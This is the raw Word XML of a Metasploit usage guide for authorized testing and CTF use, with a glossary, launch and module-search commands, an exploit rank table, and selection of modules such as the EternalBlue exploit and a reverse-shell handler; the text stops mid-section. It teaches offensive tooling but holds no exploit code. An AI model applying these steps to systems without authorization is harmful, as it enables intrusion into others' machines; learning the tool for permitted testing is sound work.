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0D0D0D" w:val="clear"/>
        <w:spacing w:before="480" w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF4444"/>
          <w:sz w:val="60"/>
          <w:szCs w:val="60"/>
        </w:rPr>
        <w:t xml:space="preserve">METASPLOIT FRAMEWORK</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="0D0D0D" w:val="clear"/>
        <w:spacing w:after="120"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="FF8C00"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Complete Usage Guide &amp; Quick Reference</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="0D0D0D" w:val="clear"/>
        <w:spacing w:after="480"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="666666"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">For authorized penetration testing and CTF use only</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:left w:val="single" w:color="FF4444" w:sz="6"/>
        </w:pBdr>
        <w:shd w:fill="1A0000" w:val="clear"/>
        <w:spacing w:before="80" w:after="80"/>
        <w:ind w:left="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="FF4444"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">WARNING: Only use Metasploit on systems you own or have explicit written permission to test. Unauthorized use is illegal under the Computer Fraud and Abuse Act (CFAA) and equivalent laws worldwide.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A1A2E" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF4444"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">What is Metasploit?</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="FF4444" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:shd w:fill="1A1A2E" w:val="clear"/>
        <w:spacing w:before="200" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:color w:val="CCCCCC"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Metasploit Framework (MSF) is the most widely used penetration testing platform in the world. It provides a massive library of exploits, payloads, auxiliary modules, and post-exploitation tools that security professionals use to test systems for vulnerabilities.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A1A2E" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:color w:val="CCCCCC"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">It is pre-installed on Kali Linux and Parrot OS. It can also be installed on any Linux system.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A1A2E" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF8C00"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Key Concepts</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A1A2E" w:val="clear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44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7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44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8C00"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Exploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Code that takes advantage of a vulnerability in a target system</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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0D0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8C00"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Payload</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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0D0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CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">The code that runs on the target after exploitation (e.g. open a shell, create a user)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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8C00"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Module</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Any individual component in Metasploit - exploits, payloads, scanners, etc.</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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0D0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8C00"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">RHOSTS</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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0D0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CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Remote host - the target IP address you are attacking</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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8C00"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">LHOST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Local host - your own IP address (used for reverse shells to call back to you)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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0D0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8C00"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">LPORT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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0D0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CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Local port - the port on your machine that listens for the reverse shell connection</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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8C00"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Session</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">An active connection to a compromised target</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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0D0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8C00"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Meterpreter</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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0D0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CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">An advanced payload that gives you a powerful interactive shell on the target</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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8C00"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Auxiliary</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Modules that don't exploit but scan, enumerate, or brute force</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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0D0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8C00"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Post</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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0D0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CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Post-exploitation modules - run after you already have access</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A1A2E" w:val="clear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FF4444"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 1 - Launch Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="FF4444" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:shd w:fill="1A1A2E" w:val="clear"/>
        <w:spacing w:before="200" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/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msfconsole</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # launches the Metasploit console</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A1A2E" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:color w:val="CCCCCC"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">You will see the msf6 &gt; prompt. You are now inside the Metasploit console.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A1A2E" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="CCCCCC"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Useful startup commands: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msfconsole -q</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # launch without the banner (quiet mode)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msfdb init</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # initialize the database (run this first if using Kali)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db_status</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # check if database is connected inside msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A1A2E" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF4444"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 2 - Search for Modules</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="FF4444" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:shd w:fill="1A1A2E" w:val="clear"/>
        <w:spacing w:before="200" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:color w:val="CCCCCC"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Search by service name, CVE number, platform, or keyword:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A1A2E" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF8C00"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Search by Service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search smb</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # find all SMB related modules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search ftp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # find FTP exploits and scanners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search rdp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # find RDP exploits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search ssh</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # find SSH brute force and exploits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search apache</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # find Apache web server exploits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search tomcat</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # find Apache Tomcat exploits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search wordpress</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # find WordPress exploits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search iis</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # find Microsoft IIS exploits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search mysql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # find MySQL exploits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search mssql</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # find Microsoft SQL Server exploits</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A1A2E" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF8C00"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Search by CVE or Platform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search cve:2017-0144</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # search by specific CVE number (EternalBlue)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search cve:2021-44228</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # search by CVE (Log4Shell)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search platform:windows type:exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # filter by platform and type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search platform:linux type:exploit</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # Linux exploits only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search type:auxiliary name:scanner</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # find scanner modules</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A1A2E" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF8C00"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Understanding Search Results</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:color w:val="CCCCCC"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Results show: #, Name, Date, Rank, Check, Description</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A1A2E" w:val="clear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44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Rank</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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44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FF41"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">excellent</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Works reliably, will not crash the service</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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0D0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FF41"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">great</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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0D0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CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Works well, has default target</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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FF41"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">good</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Works on common platforms</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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0D0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FF41"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">normal</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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0D0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CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Works but may require specific conditions</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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FF41"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">average</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">May not always work</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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0D0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FF41"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">low</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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0D0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CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Almost never works</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr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FF41"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">manual</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="7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CCCCCC"/>
                <w:sz w:val="20"/>
                <w:szCs w:val="20"/>
              </w:rPr>
              <w:t xml:space="preserve">Requires significant manual steps</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A1A2E" w:val="clear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FF4444"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">Step 3 - Select and Configure a Module</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:bottom w:val="single" w:color="FF4444" w:sz="4" w:space="1"/>
        </w:pBdr>
        <w:shd w:fill="1A1A2E" w:val="clear"/>
        <w:spacing w:before="200" w:after="200"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF8C00"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">Select a Module</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:color w:val="CCCCCC"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Use the module path from search results:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A1A2E" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/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use exploit/windows/smb/ms17_010_eternalblue</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # select EternalBlue SMB exploit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use exploit/multi/handler</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # generic listener for catching reverse shells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use auxiliary/scanner/portscan/tcp</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # TCP port scanner</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A1A2E" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:rPr>
          <w:color w:val="CCCCCC"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">Or use the number from search results:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A1A2E" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/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use 0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # select module number 0 from last search results</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:shd w:fill="1A1A2E" w:val="clear"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF8C00"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">View Module Information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info</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # show full details about the selected module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info -d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # show detailed info with documentation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info 5 -d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
          <w:color w:val="666666"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t xml:space="preserve">  # show detailed info for search result number 5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options</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
